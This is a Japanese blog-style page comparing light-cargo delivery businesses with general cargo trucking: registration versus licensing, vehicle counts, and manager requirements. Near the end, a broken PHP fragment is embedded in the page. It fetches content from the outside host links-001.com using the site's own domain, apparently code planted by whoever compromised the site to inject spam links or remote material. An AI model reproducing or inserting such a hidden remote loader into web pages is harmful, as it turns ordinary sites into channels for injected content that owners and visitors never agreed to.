前へ
次へ

軽貨物など運送の仕事を行う際によく聞く運行管理責任者とは?

軽貨物など運送の仕事をしていると良く聞く資格の1つとして運行管理責任者といった資格があります。実際に

more

軽貨物の運送業者としてステップアップする方法

軽貨物の運送業者として働いている時、なかなか給料が上がらないといったことがあります。もしステップアッ

more

お客様への軽貨物の運送の際にかけられる時間

軽貨物の求人や軽貨物の運送業者として運送を行う場合とどちらのケースでも短時間ですべての荷物を配り終え

more

軽貨物の運送業者と一般貨物自動車運送の違い

軽貨物を含む運送業者には様々な区分分けがあります。主に3種類に分けることが可能で一般貨物自動車運送事業・特定貨物自動車運送事業・軽貨物運送事業となっています。軽貨物による運送事業と一般貨物自動車運送ではどういった点で違いがあるのでしょうか。まず1つ目が手続きの方法です。軽貨物の運送業者を始める場合、関係する公的機関へと届出を行えばすぐに軽貨物による運送を行うことが可能です。しかし一般貨物自動車運送の場合は許可制となっているため役所からの許可が必要となってきます。軽貨物の運送業者は必要な手続きをすれば、書類に不備がない限り軽貨物の運送の依頼を受けることに関して何ら支障はありません。ですが、一般貨物の場合許可が下りなければ荷物の輸送を行うことができないといったことになります。また許可が出るまでに数か月といった時間がかかるため軽貨物の運送の様に届出したその日から仕事をするといったことは難しいでしょう。2つ目が用意すべき車両の台数や人員の数が異なるということです。軽貨物の運送業者の場合営業用車両が1台しかなくても申請が行えます。一方で一般貨物自動車運送事業の場合は軽トラックを除いて5台以上車両を準備する必要があります。そのため軽貨物の運送業者とは異なりアルバイトではない自分以外のドライバーを確保する必要があります。それ以外にも軽貨物の運送業者の場合は運行管理者を運転者本人が兼ねることが可能となっています。しかし、一般貨物自動車運送事業の場合運行管理資格者が1名以上必要となってきます。また軽貨物の運送業者では10代以上でない限り必要とならない整備管理者に関しても設置が必要となります。このように軽貨物と一般自動車運送事業の場合様々な違いが出てきます。軽貨物の運送業者と違い、一般車両の方が許可基準も厳しい分素人が始めるには難しいといえそうです。しかし、軽貨物の場合軽自動車しか営業車両にできませんし、運べる荷物の量も限られます。そのため自分が行いたい事業には軽貨物か一般貨物かどちらがマッチングするかをチェックしてうえで事業を始めましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top